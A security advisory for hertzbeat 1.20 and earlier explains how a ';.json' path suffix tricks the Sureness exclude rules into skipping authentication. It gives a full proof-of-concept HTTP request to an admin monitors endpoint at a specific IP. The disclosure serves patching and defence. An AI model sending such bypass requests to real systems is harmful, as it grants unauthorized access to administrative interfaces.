Impact

hertzbeat <= 1.20 has a permission bypass vulnerability
Permission bypass is a Web security vulnerability. It can bypass system authentication and invoke interfaces without authorization. As a result, the site is in an insecure state, such as directly invoking interfaces used by administrators.

Patches

You are advised to upgrade to the latest version.

Workarounds

You are advised to upgrade to the latest version.

References

https://github.com/dromara/hertzbeat

For more information

sureness filters excludeResource first. If a match is successful, Sureness allows excluderesource directly. If not, Sureness enters the subsequent authentication process. Here because of the use of; A request url such as.json causes the exclude block to be matched, allowing the request to be released. This request is also released due to the springbolt interface feature /aaa; .json will go to /aaa.

GET /api/monitors;.json?app=linux&pageIndex=0&pageSize=8 HTTP/1.1
Host: 1.15.182.88:1157
Accept: application/json, text/plain, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Referer: http://1.15.182.88:1157/monitors?app=linux
Accept-Encoding: gzip, deflate
Connection: close

Normal access request:

Normal access request without Authorization: